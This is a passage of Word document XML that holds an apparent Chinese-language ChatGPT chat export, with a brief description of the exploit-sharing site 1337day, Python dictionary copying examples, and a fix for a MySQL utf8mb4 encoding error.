    <w:p w14:paraId="2240E606" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC54720" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果你需要更详细的信息，建议你直接查阅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的官方文档，或者联系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的技术支持。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61467362" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C571DB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1337DAY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FADD70B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1F9DD6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56F6D03D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1337day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也被称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Inj3ct0r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，是一个安全研究和黑客社区，主要集中在发现和分享新的安全漏洞，以及编写和发布利用这些漏洞的工具和代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559FA886" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6910F9E3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它提供一个在线数据库，其中包含了各种类型的漏洞利用（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exploits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），例如针对特定软件的远程代码执行（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）漏洞、服务拒绝（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）攻击、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击等。用户可以在网站上搜索特定的漏洞利用，或者上传自己发现或编写的漏洞利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F782B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42C1E961" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，使用这些漏洞利用攻击其他人或组织的系统是违法的。这些信息应该只用于合法的目的，例如帮助系统管理员检测和修复自己系统中的漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24230D53" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC2EFE2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给函数传入字典，貌似传递了引用，如何优化？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24799CED" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6885F242" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75ABB6B9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，传递给函数的都是对象的引用，不论这个对象是不可变的（如整数、字符串、元组等）还是可变的（如列表、字典、集合等）。所以，当你传递一个字典到一个函数并在函数中修改它时，原来的字典也会被修改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578DD4DC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="772BED49" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你不想在函数中修改原来的字典，你可以在函数内部创建字典的一个拷贝。这样，你就可以在拷贝上进行修改，而不影响原来的字典。有两种方法可以创建字典的拷贝：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">dict.copy() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> copy.deepcopy() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。下面是示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3B02E7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51EB3BA6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485C2027" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def func1(d):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114A51A3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    d = d.copy()  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建浅拷贝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2A890B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    d['a'] = 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D858FD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(d)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDAD4A0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751BDB7C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def func2(d):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C00A53" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    import copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A58E9BF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    d = copy.deepcopy(d)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建深拷贝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C04D4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    d['a'] = 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3821F496" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(d)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B0E17B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61C6EDFE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>d = {'a': 1, 'b': 2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A51FF6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func1(d)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C7EF6C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(d)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{'a': 1, 'b': 2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0538A78D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6980913B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>d = {'a': 1, 'b': 2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04506971" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>func2(d)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE9C1D6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(d)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{'a': 1, 'b': 2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BDE18A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C82712F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这两种方法的区别在于：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">dict.copy() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建的是浅拷贝，如果字典中的值是可变对象（如列表），那么修改拷贝中的值也会影响原来的字典；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">copy.deepcopy() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建的是深拷贝，即完全复制字典及其所有值，不论这些值是可变的还是不可变的。所以，根据你的需求，你可以选择使用其中的一种方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533CC9E7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1A74BD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>(1366, "Incorrect string value: '\\xF0\\x9F\\x92\\xA3\\xF0\\x9F...' for column 'source' at row 1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FD5DFD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0B78E6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6929B5B1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个错误是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库的错误，表示你试图将一个字符串插入到一个字段，但是这个字符串包含了该字段无法存储的字符。这个错误通常发生在试图插入包含非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ASCII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符或特殊字符（如表情符号）的字符串到一个字符集不支持这些字符的字段时。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002C329A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A9DF59E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在你的错误消息中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">\xF0\x9F\x92\xA3\xF0\x9F </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个四字节的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unicode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符，通常是一种表情符号（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Emoji</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的默认字符集（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">latin1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）无法存储四字节的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unicode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符。因此，当你试图将这个字符串插入数据库时，就会发生错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E486AA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520F0EEF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决这个问题的一种方法是将你的数据库或表或字段的字符集更改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这是一个可以存储任何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unicode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符的字符集，包括四字节的字符。你可以使用以下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句来修改字符集：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BCC53C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32E7638B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E28FAE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改数据库的字符集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAEEB4B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ALTER DATABASE database_name CHARACTER SET = utf8mb4 COLLATE = utf8mb4_unicode_ci;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20855113" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3583FB8D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改表的字符集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23562C29" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ALTER TABLE table_name CONVERT TO CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE8F5DD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="732CF85F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改字段的字符集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F415398" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ALTER TABLE table_name CHANGE column_name column_name COLUMN_TYPE CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2830A418" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D13F732" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> database_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">table_name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> column_name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换为你的数据库、表和字段的名称，将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> COLUMN_TYPE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换为你的字段的类型。</w:t>
      </w:r>
    </w:p>
